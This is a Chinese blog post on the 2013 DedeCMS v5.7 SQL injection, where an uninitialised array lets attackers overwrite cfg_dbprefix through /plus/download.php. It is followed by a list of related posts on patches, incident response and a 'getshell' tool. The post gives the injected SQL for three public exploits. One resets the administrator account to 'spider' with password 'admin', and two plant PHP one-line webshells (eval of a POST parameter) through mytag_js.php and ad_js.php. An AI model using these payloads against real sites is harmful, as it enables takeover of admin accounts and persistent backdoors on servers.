dedecms mytag_js.php,DedeCMS v5.7最新漏洞

最新推荐文章于 2024-04-16 11:07:06 发布
最新推荐文章于 2024-04-16 11:07:06 发布
阅读量855 收藏
点赞数
文章标签: dedecms mytag_js.php

首先我们一起来了解下DedeCMS v5.7漏洞情况:

1、漏洞描述

漏洞所在版本:DedeCMS v5.7

漏洞发布时间:2013年06月07日

漏洞修复版本:DedeCMS v5.7 20130607之后版本

漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。

漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两个数组,结合程序不安全的参数处理机制,导致我们能够覆盖程序中任意全局变量。因此我们可通过控制全局变量$GLOBALS['cfg_dbprefix']的值,进而通过$prefix值和/plus/download.php中的SQL语句构造,从而造成了此SQL注入漏洞。

由于DedeCMS使用广泛,而此高危注入漏洞利用方便,并且能够因此远程获取到管理后台管理员,或者可getshell获取到系统的控制权。网上已公开的有以下3种EXP:

1.1修改后台管理员

(1)如:构造如下注入SQL语句:

cfg_dbprefixadmin` SET `userid`='spider',

`pwd`='f297a57a5a743894a0e4' where id=1

#修改后台管理员为:用户名spider,密码admin。

(2)对应的EXP:

 a4c26d1e5885305701be709a3d33442f.png

(3)执行EXP后,相应后台数据库表变为如下:

 a4c26d1e5885305701be709a3d33442f.png

(4)因此相应后台登录用户变为spider密码admin

1.2通过/plus/mytag_js.php文件生成一句话木马php

(1)如:构造如下注入SQL语句:

cfg_dbprefixmytag` (aid,expbody,normbody)

VALUES(9013,@`\'`,'{dede:php}file_put_contents(''mybak.php'',''<?php

eval_r($_POST[mybak]);?>'');{/dede:php}') #

@`\'`

(2)对应的EXP:

 a4c26d1e5885305701be709a3d33442f.png

(3)执行EXP后,将向数据库表dede_mytag中插入一条记录,如图:

 a4c26d1e5885305701be709a3d33442f.png

1.3使/plus/ad_js.php文件变为一句话木马php

(1)如:构造如下注入SQL语句:

cfg_dbprefixmyad` SET `normbody` = '<?php

eval_r($_POST[m]);?>' WHERE `aid` =1 #

(2)对应的EXP:

 a4c26d1e5885305701be709a3d33442f.png

(3)执行EXP后,将向数据库表dede_myad中插入一条记录,如图;

 a4c26d1e5885305701be709a3d33442f.png

波拿拿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dedecms mytag_js.php,诊断网站是否用织梦搭建,你知道有几个方法呢,我知道这几个?...
weixin_32821579的博客
03-09 198
原标题:诊断网站是否用织梦搭建,你知道有几个方法呢,我知道这几个?近来有不少站长咨询冬镜,为什么他发一个网站我就知道是用织梦搭建的,其实这个也不算是啥高新技术,自己熟悉一点dedecms的站长或者技术人员都是可以看得出来的。诊断网站是否用织梦搭建 判断网站是不是用织梦DEDECMS建的识别教程冬镜在这里只是简单分享几个常见的识别教程,鉴别是否用织梦搭建的方法并不仅限于此!诊断网站是否用织梦搭建 1...
dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injecting PHP Code By /plus/download.php Into DB ...
weixin_30388677的博客
01-20 572
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 对于这个漏洞,我们可以简单概括如下 1. "/plus/download.php"文件会引入"/include/common.inc.php"文件 2. "/include/common.inc.php"中会对用户输入的变量进行"变...
mytag js.php入侵,防范 dedecms 广告内容插入后门
weixin_39679091的博客
03-10 324
dedecms广告内容没有做限制,可以输入脚本信息,并写入文件,导致木马植入!此补丁,是防止广告里带PHP脚本并写入文件!核心代码:ad_js.php//禁止写入和PHP脚本有关字符信息//==========================================================================if ((strripos($adbody,"")>=0...
dedecms 5.7 最新 mytag_js.php漏洞解决方法
gxtiou的专栏
02-19 6232
其实是安全检查的时候没有限制敏感变量 找到文件  /include/common.inc.php 将这行 大概在58行  if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) )  改为  if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS|_GET|_PO
dedecms mytag_js.php,一种奇特的DEDE隐藏后门办法_91Ri.org
weixin_28965739的博客
03-09 4682
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:Default{dede:php}file_put_contents(’90sec...
织梦plus mytag_js.php,织梦dedecms 插件plus文件调用头部尾部的方法
weixin_33470084的博客
03-27 311
织梦dedecms 插件plus文件调用头部尾部的方法织梦无忧2018-12-06 11:51摘要:织梦dedecms 插件plus文件调用头部尾部的方法 。 方法一: 进入自定义宏标记,正常显示内容里增加:{dede:include filename=head.htm/} 回到自定义标签列表,点击JS调用可以得到JS调用代码script src=/plus/mytag_js.php?aid=1 ...
织梦mytag_js.php,Dedecms搜索页面调用文章列表的方法
weixin_36171927的博客
03-11 144
余斗个人博客的搜索结果页做好之后,发现一个bug,右侧的最新文章和点击排行根本显示不出来,这里余斗用的是文章页模版的调用语句,在文章页可以正确显示,而搜索结果页则无效,代码如下:点击排行{dede:arclist row="8" orderby="click" titlelen="40"}[field:title/]{/dede:arclist}余斗修改标签语句好久都不能实现,百度了一下,发现原因...
VID_20201115_143620.mp4
12-07
I have an error code in lua which I have tried long to fix. first: the code: if boolean fs.isDirectory("C:/Program Files/Factorio/Config") == true then end else fs.makeDirectory("C:/Program Files/...
收割机Getshell软件.zip
05-30
扫描后缀.txt,存放shell扫描用的后缀,自己可以添加更多后缀。 webshell.txt,存放扫描到的Webshell。 uploaddata/asp.txt,存放asp上传文件。...uploaddata/php.txt,存放php上传文件。 收割机.exe,主程序
Android-LogCat-tool.zip_-baijiahao_android logcattool_logcat_log
09-14
- **过滤器**: 可以通过指定标签(tag)或优先级来过滤日志,例如`adb logcat *:V MyTag:D`,这将显示所有日志(包括verbose级别),同时对"MyTag"的日志特别关注,设置为debug级别。 2. **日志级别** - **V ...
应急响应实例分享1
08-04
单独的html页面还不足以成为后门,但是通过结合mytag_js.php文件就有了大用处,通过查看源码未发现mytag_js.php文件,从日志中也可看到之后在对mytag_js.php进行访问,服务器就已经响应404了,可见攻击者已经删除了...
响应式国际货运物
05-14
Disallow: /plus/mytag_js.php Disallow: /plus/rss.php Disallow: /plus/search.php Disallow: /plus/recommend.php Disallow: /plus/stow.php Disallow: /plus/count.php Disallow: /include Disallow: /templets
应急响应实战笔记——Web实战篇:⑥ 管理员账号被篡改
君逍遥o
04-16 1118
你是某一个网站的管理员,有一天,你的管理员账号admin却登录不了,进入数据库查看,原来管理员账号用户名不存在了,却多了另外一个管理员用户名。不对,不是新增了管理员,而是你的管理员用户名被篡改了。
dedecms mytag_js.php,DedeCmsMytag 标记
weixin_39610488的博客
03-09 76
关键字描述:标记 定义 &nbsp 可以 模板 内容 效果 我们 代码 表示DedeCmsMytag 标记自定义宏标记的应用今天天涯来介绍下自定义宏标记的应用,大家可以进入后台,在“模板管理”-》“自定义宏标记”中查看到该选项。自定义宏标记的作用:可以将模板中多次出现的相同元素用一个自定义标记表示出来,从而达到,一次更改,全局更换的效果。辅助插件的广告管理也有相似的效果。适用范围:网页模...
plusmytag_js.php,PHP等语言SQL注入的问题
weixin_36476695的博客
03-09 381
很多人在做开发的时候并没有注意到SQL的查询是可以被改掉的,其实SQL却是最不安全的因素之一,通过SQL,更有可能去直接执行系统命令,在服务器上新建用户,修改密码等操作也不是不可能。直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQL 语句的技术,从而达到取得隐藏数据,或覆盖关键的值,甚至执行数据库主机操作系统命令的目的。这是通过应用程序取得用户输入并与静态参数组合成 SQL 查询来实...
dedecms 最新漏洞 利用mytag_js上传文件
zdkjob专栏
08-25 7412
制作文件  然后在自己远程支持外链的mysql库中的表前缀_mytag 中插入insert into dede_mytag(aid,normbody) values(2,'{dede:php}$fp = @fopen(DEDEROOT."da
一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)
云度
10-18 7778
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? 无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下: 1 {dede:php}file_put_c
利用安全狗防护DedeCMS v5.7高危注入漏洞 [复制链接]
IT技术宅-北方的刀郎
03-21 8344
漏洞修复版本:DedeCMS v5.7 20130607之后版本http://bbs.safedog.cn/thread-52264-1-1.html       漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。       漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两
ASP网上拍卖系统设计与实现(论文+源代码+开题报告).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
基于Android远程监控工具设计与实现.docx
最新发布
08-10
基于Android远程监控工具设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值